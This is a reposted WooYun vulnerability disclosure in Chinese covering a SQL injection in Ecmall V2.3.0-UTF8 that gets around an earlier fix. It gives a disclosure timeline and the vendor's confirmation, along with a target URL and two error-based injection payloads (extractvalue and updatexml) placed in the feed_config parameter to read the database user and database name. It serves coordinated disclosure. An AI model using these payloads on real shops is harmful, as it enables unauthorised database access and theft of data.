Ecmall V2.3.0-UTF8 正式版SQL注入漏洞之二

2015年4月24日11:36:58评论279 views字数 238阅读0分47秒阅读模式

摘要

2014-07-09：细节已通知厂商并且等待厂商处理中
2014-07-09：厂商已经确认，细节仅向厂商公开
2014-07-12：细节向第三方安全合作伙伴开放（绿盟科技、唐朝安全巡航、无声信息）
2014-09-02：细节向核心白帽子及相关领域专家公开
2014-09-12：细节向普通白帽子公开
2014-09-22：细节向实习白帽子公开
2014-10-07：细节向公众公开

漏洞概要关注数(3) 关注此漏洞

缺陷编号： WooYun-2014-67686

漏洞标题： Ecmall V2.3.0-UTF8 正式版SQL注入漏洞之二

漏洞作者： HackBraid

提交时间： 2014-07-09 17:26

公开时间： 2014-10-07 17:28

漏洞类型： SQL注射漏洞

危害等级：高

自评Rank： 10

漏洞状态：厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： php+数字类型注射 php源码审核白盒测试

1人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞http://**.**.**.**/bugs/wooyun-2010-065340可被以下函数绕过：

1.updatexml函数

2.extractvalue函数

漏洞证明：

url:

http://localhost/ecmal/upload/index.php?app=member&act=feed_settings

payload1:

code 区域

feed_config[1' or extractvalue(1,concat(0x5c,(select user())))#]=v

payload2:

code 区域

feed_config[1' or updatexml(2,concat(0x7e,(database())),0)#]=v

修复方案：

再把这两个函数加到过滤字符里

版权声明：转载请注明来源 HackBraid@乌云

漏洞回应

厂商回应：

危害等级：低

漏洞Rank：5

确认时间：2014-07-09 17:28

厂商回复：

非常感谢您为shopex信息安全做的贡献
我们将尽快修复
非常感谢

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2014-07-21 17:05 | 从容 ( 普通白帽子 | Rank:415 漏洞数:99 | 哇啦啦啦啦啦我的宝贝 | ..)

3

封贴，楼下是二货

1# 回复此人

漏洞概要 关注数(3) 关注此漏洞